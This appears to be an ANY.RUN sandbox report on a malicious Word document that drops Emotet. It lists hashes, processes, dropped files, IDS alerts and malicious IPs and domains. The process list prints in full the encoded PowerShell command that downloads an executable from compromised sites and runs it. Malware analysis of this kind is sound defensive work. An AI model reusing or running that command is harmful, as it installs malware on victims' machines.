analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

DATI-0910-2019.doc

Full analysis: https://app.any.run/tasks/c73f60f8-7b93-4eaf-ab16-07902c5778cf
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: October 09, 2019, 15:21:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tools & Automotive, Subject: Re-engineered, Author: Damien Turcotte, Keywords: salmon, Comments: Tasty Metal Table, Template: Normal.dotm, Last Saved By: Trever Pacocha, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 13:22:00 2019, Last Saved Time/Date: Wed Oct 9 13:22:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 173, Security: 0
MD5:

512E4524F004B36788AEE0B3A07F17AA

SHA1:

C1020BED3E58F20DC4936E77A564484C7DFBD3B3

SHA256:

8234695C732D45A6E03A128D6CD6E4D0F72ED70EE4327252F82C95283F36A705

SSDEEP:

6144:6k+grXwZAs3MpPxTqfVginlGAiBqlMVO+:6k+grXwf3ExTqfwEeg+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Emotet process was detected

      • 534.exe (PID: 3968)

    • Application was dropped or rewritten from another process

      • 534.exe (PID: 3968)
      • msptermsizes.exe (PID: 3744)
      • 534.exe (PID: 3136)
      • msptermsizes.exe (PID: 2416)

  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2496)

    • PowerShell script executed

      • powershell.exe (PID: 2496)

    • Executed via WMI

      • powershell.exe (PID: 2496)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2496)
      • 534.exe (PID: 3968)

    • Starts itself from another location

      • 534.exe (PID: 3968)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2812)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2812)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Simonis
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 202
Paragraphs: 1
Lines: 1
Company: Lynch, Gutkowski and Brakus
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 173
Words: 30
Pages: 1
ModifyDate: 2019:10:09 12:22:00
CreateDate: 2019:10:09 12:22:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Trever Pacocha
Template: Normal.dotm
Comments: Tasty Metal Table
Keywords: salmon
Author: Damien Turcotte
Subject: Re-engineered
Title: Tools & Automotive
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 534.exe no specs #EMOTET 534.exe msptermsizes.exe no specs msptermsizes.exe

Process information

PID
CMD
Path
Indicators
Parent process
2812"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DATI-0910-2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2496powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABjADMANQA0ADIANwAxADAANgBiADAAYgBiAD0AJwBiADgANgAwAGMAMQAwADkAMQA5ADAAOAA4ACcAOwAkAHgANwA3AGMAMwAwAGIAOQAzADMAMgAzACAAPQAgACcANQAzADQAJwA7ACQAYwAyADUANAA5ADcANQA2ADcAMQAyAGIANQA9ACcAYwAwADAAMAA5ADAAMwBjADcAMAA4ACcAOwAkAGMANAAwADgAeAB4ADcAMgAzAGIAYgAwADAAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHgANwA3AGMAMwAwAGIAOQAzADMAMgAzACsAJwAuAGUAeABlACcAOwAkAGIAMAA2ADUAMQAzAGIAMAA4ADAAMQAwAD0AJwBiADAAMAAwADEAMAA2AGIAMAAwADkANwAwACcAOwAkAGMANQB4AGIAOQA5ADAAMAAxADAAMAAwAD0ALgAoACcAbgBlACcAKwAnAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAFcAZQBCAGMAbABJAEUATgBUADsAJABiADAAMwA0ADgAMAA1AHgAMwA3ADAAYwA9ACcAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHYAaQBiAGUAcwBjAHkAYQBoAGQAbwBuAGUALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGQAMAA0AGwAMQAzADkANQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbQBhAGMAdQBzAHQAaQBjAGEALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHMAMQB1AHYANQA5ADYAMAAvAEAAaAB0AHQAcABzADoALwAvAHcAaABvAGIAdQB5AGoAdQBuAGsAYwBhAHIAcwAuAGMAbwBtAC8AYwBzAHMALwBmADUALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGQAaAB1AHIAZgByAHUAaQB0AHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAGoAMgA2AGgAOAB5ADAAMAA2ADgANQAvAEAAaAB0AHQAcAA6AC8ALwB3AGUAcwB0AGUAcgBuAHYAZQByAGkAZgB5AC4AYwBvAG0ALwB0AGUAbQBwAGwAYQB0AGUALwBwAGkAdgBwADgAMAA2ADQALwAnAC4AIgBTAGAAUABMAGkAdAAiACgAJwBAACcAKQA7ACQAYwA0AGIAMgAwAGIAOAA4ADAAMABiAD0AJwB4ADAANgAwADcAMAAwADIAOABjADUANAAnADsAZgBvAHIAZQBhAGMAaAAoACQAYwA0ADgAYgA3ADYAMwBiADYANgA1ADIAMwAgAGkAbgAgACQAYgAwADMANAA4ADAANQB4ADMANwAwAGMAKQB7AHQAcgB5AHsAJABjADUAeABiADkAOQAwADAAMQAwADAAMAAuACIARABvAFcAYABOAGAATABPAEEAYABkAEYASQBMAEUAIgAoACQAYwA0ADgAYgA3ADYAMwBiADYANgA1ADIAMwAsACAAJABjADQAMAA4AHgAeAA3ADIAMwBiAGIAMAAwACkAOwAkAHgAOAA5ADcANAA5ADkAMAA1AGMAOAAyAD0AJwB4AGIAMABiADkAeAAwADAANAAwAHgAYwA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAYwA0ADAAOAB4AHgANwAyADMAYgBiADAAMAApAC4AIgBMAEUATgBHAGAAVABIACIAIAAtAGcAZQAgADMANgA1ADcAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAHIAdAAiACgAJABjADQAMAA4AHgAeAA3ADIAMwBiAGIAMAAwACkAOwAkAGIAMAA5ADAANwB4AGIAMgA5ADQAOQA9ACcAYgAyADIAMAAxAHgANgBjADMAOABiADQAJwA7AGIAcgBlAGEAawA7ACQAYwA3ADEAMwAwADcAYwA2ADkANwBiAD0AJwB4ADkANAAyADMANwA1AHgANgAwADEAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYwBiADIAMQA4ADMANQAwADEAOQA1AGIAMAA9ACcAYwA2ADkAMABjADAANgA1ADAANAAwACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3136"C:\Users\admin\534.exe" C:\Users\admin\534.exepowershell.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3968--2a7737f4C:\Users\admin\534.exe
534.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
3744"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe534.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Exit code:
0
Version:
1, 0, 0, 1
2416--f91b2738C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
msptermsizes.exe
User:
admin
Company:
Monkey Head Software
Integrity Level:
MEDIUM
Description:
Monkey Head Media Stream
Version:
1, 0, 0, 1
Total events
1 728
Read events
1 234
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
2812WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRD84.tmp.cvr
MD5:
SHA256:
2496powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HRN69PUB50CXRCZG4Q8D.temp
MD5:
SHA256:
2812WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5C61C09.wmfwmf
MD5:731256945FE8353FE851360AFFA95987
SHA256:3D711EBD58E499AC9AAA0342F17F191FDA8390721CEF38C15F979849FF19A26D
2812WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:17425C5DBD560D6158837C2C6785FF69
SHA256:9146EE83986869E716BCB439B057AACC6099A5D0242CC475C7A202066BC98B70
2812WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6869566D.wmfwmf
MD5:8F5148F95768D0EDCAA9ECD24304AAB0
SHA256:284456208D93AD47EBB9AA480E3F17457F71C727A3AF58639D393A18522597FE
2812WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$TI-0910-2019.docpgc
MD5:A924D24E095419D7D8A922E038B6141F
SHA256:39A3A277584CCC8EC3892441054EF7AE0A5F31FB03F8DB1B45A69DB5C5E23765
2812WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4EE49BB.wmfwmf
MD5:4214E5D0B5C8374D9D1E603F5E76338B
SHA256:B466E62FDC7238C2CE2CF9811A5B413B018326E43E74EEFBB798A76B599156C4
2812WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\22165228.wmfwmf
MD5:85D1EBD13522C73F32A2BFAD7B1EE9DB
SHA256:CEE843F10E6DDBA109A0D74FDEA24B7C9B2D9AF2EA9D11AA351178C2D280C363
2812WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5544A11C.wmfwmf
MD5:55FFEA33EEC6706EEE43D6F1B5A9746F
SHA256:13606CB4356F1F9DC9914654171CD14104CE61099A015F93E15044C565F25E00
2812WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B8AA003.wmfwmf
MD5:0E81BBF1997F2E8662E91863B83E27F8
SHA256:17079242F0A4C570BDEAF2639ED5FA8B34BE5B7A24267B0684C82E97B4BD8A9A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2416
msptermsizes.exe
POST
91.83.93.105:8080
http://91.83.93.105:8080/acquire/merge/
HU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2416
msptermsizes.exe
91.83.93.105:8080
Invitech Megoldasok Zrt.
HU
malicious
2496
powershell.exe
107.180.54.252:80
www.vibescyahdone.com
GoDaddy.com, LLC
US
malicious

DNS requests

Domain
IP
Reputation
www.vibescyahdone.com
  • 107.180.54.252
malicious

Threats

PID
Process
Class
Message
2496
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2496
powershell.exe
A Network Trojan was detected
AV INFO Suspicious EXE download from WordPress folder
2496
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2496
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
DATI-0910-2019.doc